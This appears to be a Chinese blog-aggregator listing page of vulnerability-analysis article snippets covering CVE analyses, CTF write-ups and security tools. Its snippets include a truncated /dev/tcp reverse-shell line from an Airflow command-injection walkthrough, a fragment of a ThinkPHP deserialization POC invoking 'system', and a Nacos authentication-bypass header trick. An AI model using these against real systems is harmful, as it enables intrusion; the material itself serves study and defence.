漏洞分析第5页

2018-2019-2 20189221 《网络攻防技术》第五周作业

2018-2019-220189221《网络攻防技术》第五周作业学习目标Web架构HTTP协议Web应用安全Web浏览器安全视频学习（16-20）漏洞分析之数据库评估（一）BBQSql:一种用Pyhthon

weixin_30780649·2023-10-19 22:22

2017-2018-2 20179202《网络攻防技术》第五周作业

漏洞分析之数据库评估（一）BBQSQL一种用Pyhthon写的SQL盲注框架。当发动QL注入漏洞攻击时，它将非常有用。BBQSQL是半自动工具，允许许多难以触发的SQL注入变得用户化。

weixin_30699443·2023-10-19 22:52

金某OA协同办公管理系统存在任意文件下载漏洞分析 CNVD-2021-43036

目录1.漏洞概述2.漏洞分析3.Nuclei自动化扫描POC4.修复方式1.漏洞概述金和OA是由北京金某网络股份有限公司开发的一款办公自动化软件。旨在提高企业的工作效率和管理水平。

afei00123·2023-10-19 21:36

漏洞预警|CVE-2023-38545 Curl 和 libcurl 堆缓冲区溢出漏洞

项目地址https://github.com/curl/curl/releases影响版本7.69.0-8.3.0漏洞分析漏洞成因在于使用SOCKS5代理过程中造成的溢出。

棱镜七彩·2023-10-19 19:11

E048-论坛漏洞分析及利用-针对Wordpress论坛插件实现远程代码执行的探索

课程名称：E048-论坛漏洞分析及利用-针对Wordpress论坛插件实现远程代码执行的探索课程分类：论坛漏洞分析及利用实验等级:中级任务场景:【任务场景】小王接到磐石公司的邀请，对该公司旗下论坛进行渗透测试

孪生质数-·2023-10-18 17:09

E049-论坛漏洞分析及利用-针对bwapp进行web渗透测试的探索

课程名称：E049-论坛漏洞分析及利用-针对bwapp进行web渗透测试的探索课程分类：论坛漏洞分析及利用------------------------------------------------

孪生质数-·2023-10-18 16:51

泛微ecology9 ofsLogin.jsp 信息泄露与前台任意用户登录漏洞分析

起因长亭最近发了一个漏洞预警《在野1day风险提示｜泛微Ecology信息泄露&前台任意用户登录漏洞》，预警文章链接为https://mp.weixin.qq.com/s/ZvbXbtcpq8EslNKZ2hHW_w，本着学习研究的态度，对漏洞可能涉及的逻辑进行了粗略研究。分析长亭在预警文章中放出了最新版本的xray，更新后的xray可以对该漏洞进行远程检测，检测命令如下./xrayws--poc

第59号实验室·2023-10-18 16:18

Apache Shiro 组件反序列化漏洞分析

概述ApacheShiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。它的原理比较简单：为了让浏览器或服务器重启后用户不丢失登录状态，Shiro支持将持久化信息序列化并加密后保存在Cookie的rememberMe字段中，下次读取时进行解密再反序列化。但

why811·2023-10-18 15:56

CVE-2021-26084 漏洞分析

基础知识Velocity.vm结尾的文件一般为Velocity模板文件$action$action是velocity上下⽂中的⼀个变量，⼀般在进⾏模板渲染前会设置到context⾥⾯。$action是当前访问路由对应的具体Action类。$action.xxx表⽰取对应Action类的xxx属性值${}和$!{}${}输出表达式的计算结果，并进行过滤$!{}原样输出表达式的计算结果，不进行任何过滤

why811·2023-10-18 04:09

nacos2.0.2漏洞分析及解决方法

绕过鉴权情况1.userAgentAuthWhite设置为true，官方没有还没有解析为啥可以通过设置userAgent可以绕过鉴权实验一只要把请求header：User-Agent设置为：Nacos-Server，即可绕过鉴权实验二只要把请求header：User-Agent设置为空值，Client-Version设置为：Nacos-Server，即可绕过鉴权上述漏洞修复：nacos.core.

RayLiang微博·2023-10-17 09:52

【墨者学院】：CMS系统漏洞分析溯源(第2题)

0x00.题目描述：背景介绍某单位需新上线了一个系统，安全工程师“墨者”负责对系统的安全检测，确保该系统在上线后不存在安全漏洞。实训目标1、了解并熟练使用linux命令；2、了解PHPCMS的后台地址及其他相关漏洞资料；3、了解html源码的重要性。解题方向登录后台后执行linux系统命令，查看web源码。0x01.解题思路：靶场环境：可以看到使用了phpcms9.1.13版本的内容管理系统。、在

阳光灿烂的日子阿·2023-10-17 08:54

E047-论坛漏洞分析及利用-针对Wordpress论坛进行信息收集与漏洞扫描的探索

任务实施:E047-论坛漏洞分析及利用-针对Wordpress论坛进行信息收集与漏洞扫描的探索任务环境说明：服务器场景：p9_kali-6（用户名：root；密码：toor）服务器场景操作系统：KaliLinux192.168.32.178

孪生质数-·2023-10-17 05:57

Nessus 漏洞扫描工具(linux window web)

Nessus不同于传统的漏洞扫描软件，Nessus可同时在本机或远端上遥控，进行系统的漏洞分析扫描。Nessus也是渗透测试重要工具之一。所以，本章将介绍安装、配置并启动Nessus。

weixin_33973600·2023-10-17 02:08

Apache Log4j2 远程代码执行漏洞修复步骤

MavenDeploy，将log4j2修复的版本包安装到Nexus5、修改项目中的pom.xml6、测试验证ApacheLog4j2远程代码执行漏洞修复步骤漏洞说明参考链接：ApacheLog4j2远程代码执行漏洞分析

飞一站·2023-10-16 20:21

小白的跨方向IoT DIR850L-A1固件漏洞分析

固件下载我是到官网的查询下载的，下载地址：http://support.dlink.com.cn/ProductInfo.aspx?m=DIR-850L也可以直接到ftp服务器上下载：ftp://ftp2.dlink.com/PRODUCTS/DIR-850L/REVA/DIR-850L_REVA_FIRMWARE_1.14.B07_WW.ZIP固件解压下载的bin文件利用binwalk进行解压b

Cyc1e·2023-10-15 05:08

Confluence OGNL表达式注入漏洞复现与分析（CVE-2022-26134）

文章目录0x01.漏洞概述0x02.环境搭建0x03.漏洞复现0x04.漏洞分析0x05.EXP0x01.漏洞概述在受影响的ConfluenceServer和DataCenter版本中，存在一个OGNL

Brucetg·2023-10-13 23:48

[漏洞分析] CVE-2023-38545 curl“史上最严重的漏洞“分析

[漏洞分析]CVE-2023-38545curl"史上最严重的漏洞"分析文章目录[漏洞分析]CVE-2023-38545curl"史上最严重的漏洞"分析漏洞简介漏洞复现环境搭建漏洞复现漏洞原理补丁分析调用栈代码分析设置代理状态第一次执行

breezeO_o·2023-10-13 18:32

shiro反序列化漏洞分析

分析源码我们去源码里面去找找，搜索rememberMe：发现有一个CookieRememberMeManager这个类，看名字就知道他多半就是处理RememberMe的逻辑，所以根据该类查看它干了什么这里继承AbstractRememberMeManager类，AbstractRememberMeManager提供了创建和验证这些令牌的方法，以及配置cookie属性的方法。这是CookieReme

故事讲予风听·2023-10-12 17:50

GitHub 优秀项目集锦

这个项目从信息泄露、远程代码执行两大方面，总结了16个案例，提供了详细的步骤对提到的漏洞进行攻击，同时还会阐述漏洞原理，进行漏洞分析。

乾研浅语·2023-10-12 12:07

phpStudy_2016-2018_RCE漏洞复现

文章目录前言一、phpStudy_2016-2018_RCE是什么二、漏洞存在的文件位置三、漏洞分析四、漏洞复现总结前言phpstudy漏洞在当时的影响还是蛮大的，所以决定对phpstudy存在的漏洞进行解析复现

for.better·2023-10-12 00:39

DLink_RCE_CVE-2019-17621浅析

文章目录1.漏洞信息2.固件分析Firmadyne提取固件信息收集UPnP协议3.漏洞分析4.调试5.Exp6.参考资料1.漏洞信息CVE-CVE-2019-17621(mitre.org)漏洞服务：UPnP

CodeStarr·2023-10-12 00:33

墨者学院——登录密码重置漏洞分析溯源

先用17101304128的进行抓包点击获取验证码发现没有验证码，所以要用18868345809拿验证抓包后，把17开头的电话号码改成了18开头的，然后获取验证码然后用17开头的电话号码重置，用18开头的验证码进行重置密码，拿到key

hacker-routing·2023-10-10 10:12

一个月软考信息安全工程师考前攻略！

三、岗位要求1、精通网络安全技术：包括端口、服务漏洞扫描、程序漏洞分析检测、

欧气满满o·2023-10-09 06:16

KongA 任意用户登录漏洞分析

KongA简介KongA介绍KongA是Kong的一个GUI工具。GitHub地址是https://github.com/pantsel/konga。KongA概述KongA带来的一个最大的便利就是可以很好地通过UI观察到现在Kong的所有的配置，并且可以对于管理Kong节点漏洞成因未设置TOKEN_SECRET导致攻击者可以伪造任意用户的token登录后台。环境搭建https://blog.cs

why811·2023-10-08 15:08

10.5 认识XEDParse汇编引擎

XEDParse库可以集成到许多不同的应用程序和工具中，因此被广泛应用于反汇编、逆向工程、漏洞分析和入侵检测等领域。官方网站

孤风洗剑·2023-10-07 17:19

CTFHUB-SSRF漏洞详解

CTFHUB-SSRF漏洞分析（一）SSRF漏洞分析与讲解一、内网访问二、伪协议读取文件2.1常见伪协议三、端口扫描SSRF漏洞分析与讲解 SSRF(服务端请求伪造,ServerSideRequestForgery

小蓝同学`·2023-10-07 07:04

RMI、JNDI、LDAP介绍+log4j漏洞分析

介绍本篇主要介绍java的RMI、JNDI、LDAP，在后面会详细分析log4j的jndi注入原理。什么是RMIRMI全称是RemoteMethodInvocatioon，也就是远程方法调用，看起来和RPC（RemoteProcedureCall）很像实际上它俩的确很像，RMI算是JAVA定制版RPC吧一个完整的RMI调用过程，需要下面几个部分注册服务RMIServer客户端接口实现接口的类执行流

IT老涵·2023-10-05 17:47

某微e-office协同管理系统存在任意文件读取漏洞复现 CNVD-2022-07603

目录1.漏洞概述2.影响版本3.漏洞等级4.漏洞复现5.Nuclei自动化扫描POC某微e-office协同管理系统存在任意文件读取漏洞分析CNVD-2022-07603https://blog.csdn.net

afei00123·2023-10-03 09:08

利用Docker安装Protostar

文章目录一、Protostar介绍二、Ubuntu下安装docker三、安装Protostar一、Protostar介绍Protostar是一个免费的Linux镜像演练环境，包含五个系列共23道漏洞分析和利用实战题目

叶卡捷琳堡·2023-10-03 00:03

某微e-office协同管理系统存在任意文件读取漏洞分析 CNVD-2022-07603

目录1.漏洞概述2.漏洞分析3.Nuclei自动化扫描POC4.修复方式1.漏洞概述泛微e-office是一款由泛微网络科技股份有限公司开发的办公自动化（OfficeAutomation，简称OA）系统

afei00123·2023-10-02 21:42

ThinkPHP V5.0.5漏洞_Thinkphp 5.1 反序列化漏洞分析

通过composer来进行环境搭建composercreate-projecttopthink/think=5.1.37v5.1.37待调试代码POCappend=["ethan"=>["dir","calc"]];$this->data=["ethan"=>newRequest()];}}classRequest{protected$hook=[];protected$filter="syste

weixin_39829236·2023-10-02 17:07

Java内存马学习-Filter

Java内存马学习-Filter基础知识Tomcat架构学习过滤链基础知识学习漏洞分析实验代码FliterDemo-doFliterApplicationFilterChain-internalDoFilterApplicationFilterChain-doFilterStandardWrapperValve-invokeApplicationFilterFactory-createFilter

lmonstergg·2023-10-02 07:15

log4j2漏洞分析

log4j2漏洞分析环境布置前言漏洞分析调用栈一些前置知识入口函数LoggerConfig.processLogEvent()AppenderControl.callAppenderAbstractOutputStreamAppender.tryAppend

lmonstergg·2023-10-02 07:45

漏洞复现----21、XXL-JOB executor 未授权访问漏洞

文章目录一、漏洞简介二、漏洞环境三、漏洞分析四、漏洞复现一、漏洞简介XXL-JOB是一个分布式任务调度平台，其核心设计目标是开发迅速、学习简单、轻量级、易扩展。

七天啊·2023-10-01 19:43

Windows堆溢出初级

0x00Windows堆管理机制（inWinXPsp2）windows由于不开源，所以堆管理机制这些基本靠大牛前辈们的逆向分析去了解细节，相比Linux的堆管理机制资料更少，有幸《0day软件漏洞分析技术

BJChangAn·2023-10-01 10:12

CVE-2020-11978 Apache Airflow 命令注入漏洞分析与利用

简介漏洞软件：ApacheAirflow影响版本：&/dev/tcp/10.10.1.7/66660>&1;#"}连接成功缓解升级到1.10.10版本之后删除或者禁用DAG，可自行删除或在配置文件中禁用默认DAGload_examples=False参考Vulhub漏洞环境详情：https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-11978&s

Flying ladybird·2023-09-30 05:02

kali入门笔记(残缺版)

8.DNSMap9.域名查询工具DMitry10.网站防火墙探测工具Wafw00f11.Nmap基础12.Nmap端口扫描13.Nmap主机发现14.Nmap指纹识别与探测15.Nmap信息收集16.漏洞分析工具

码畜也有梦想·2023-09-29 09:22

跟着白泽读paper丨Dowsing for Overflows: A Guided Fuzzer to Find Buffer Boundary Violations

USENIXSecurity上的一篇关于Overflows漏洞探索的文章，第一作者是来自VUUniversityAmsterdam的IstvanHaller，他Ph.D期间所在的团队主要从事程序分析，漏洞分析

复旦白泽战队·2023-09-29 04:23

Shiro安全（一）：Shiro-550反序列化

Shiro安全（一）：Shiro-550反序列化0x00前言0x01漏洞环境0x02漏洞原理0x03漏洞利用0x04漏洞分析0x05密钥检测0x06总结0x07参考文章0x00前言Shiro550（CVE

浔阳江头夜送客丶·2023-09-28 14:25

智能合约漏洞案例，跨链桥 Allbridge 57 万美元漏洞分析

智能合约漏洞案例，跨链桥Allbridge57万美元漏洞分析事件背景Safful区块链安全情报平台监控到消息，北京时间2023年4月1日，BSC链上Allbridge跨链桥受到黑客攻击，攻击者获利约57

比特奇点·2023-09-28 09:39

智能合约漏洞案例，Palmswap 90 万美元漏洞分析

智能合约漏洞案例，Palmswap90万美元漏洞分析据Safful安全团队情报，2023年7月25日，BSC链上的Palmswap项目遭到攻击，攻击者获利超90万美元。

比特奇点·2023-09-28 09:38

Metasploit Framework

简介目前最流行、最强大、最具扩展性的渗透测试平台软件基于Metasploit进行渗透测试和漏洞分析的流程和方法2003年由HDMore发布第一版，2007年用ruby语言重写框架集成了渗透测试标准(PETS

Depressiom·2023-09-26 16:26

Apache mod_proxy SSRF（CVE-2021-40438）的一点分析和延伸

我很久不发漏洞分析了，因为不是自己挖的漏洞，我自己的思考往往是不够的，再加上很多出漏洞的软件我都没用过，也更谈不上深入的理解，很容易落俗套变成

落沐萧萧·2023-09-26 09:34

Dusk Network DayBreak测试网初体验

1.引言Dusk系列博客有：Dusknetwork生态图rkyv(archive)——Dusknetwork赞助的ZKP研究项目DuskNetworkDaybreak上线前关键漏洞分析DuskNetwork

mutourend·2023-09-26 07:52

CVE-2019-0708漏洞分析

CVE-2019-0708漏洞分析注：仅供学习用途，利用于非法行为者与本文作者无关第一章CVE-2019-0708漏洞说明§1.1漏洞概述2019年5月14日，微软发布了针对远程桌面服务的关键远程执行代码漏洞

夏荷影·2023-09-26 00:41

CSRF攻击（跨站请求伪造）

1.CSRF原理程序员开发的时候，未对相关页面进行token和referer判断，造成攻击者可构造自己的URL地址欺骗用户进行点击漏洞分析（低级可绕过）通过这个可以更改密码改为了password中级多了

布满杂草的荆棘·2023-09-26 00:30

Sparta工具用法描述之信息收集（漏洞分析）

声明：本文仅做学习与交流，任何用于非法用途、行为等造成他人损失的，责任自负。本文不承担任何法律责任。Sparta是pythonGUI应用程序，它通过在扫描和枚举阶段协助渗透测试仪来简化网络基础结构渗透测试。通过点击并单击工具箱并以方便的方式显示所有工具输出，它可以使测试人员节省时间。如果花费较少的时间来设置命令和工具，则可以将更多的时间花费在分析结果上。Sparta软件包中包含的工具Sparta–

Java-云海·2023-09-25 12:44

nikto工具的用法描述（漏洞分析）

声明：本文仅做学习与交流，在此记录方便日后查看；同时希望也能帮助到正在看这篇文章的你。目录1、nikto简介2、nikto特征3、nikto帮助4、nikto实战4.1扫描多个地址

Java-云海·2023-09-24 05:39

应急响应学习

确定网站发生异常的时间查看日志，查看状态码，200为成功，404为不存在查看访问的路径，查看是否有目录爆破的行为查看请求方式，正常用户正常访问网页应该为GET查看UA头，看是否为扫描器等全局查看异常IP，了解目标攻击流程基于漏洞分析模拟红队成员

blackK_YC·2023-09-24 04:02

Apache Log4j2 远程代码执行高危漏洞解决方案

新闻：https://view.inews.qq.com/a/20211210A05KTY00博主其他文章Log4j2高危漏洞分析简介：ApacheLog4j2是一款优秀的Java日志框架。

石宗昊·2023-09-24 04:29

推荐频道

漏洞分析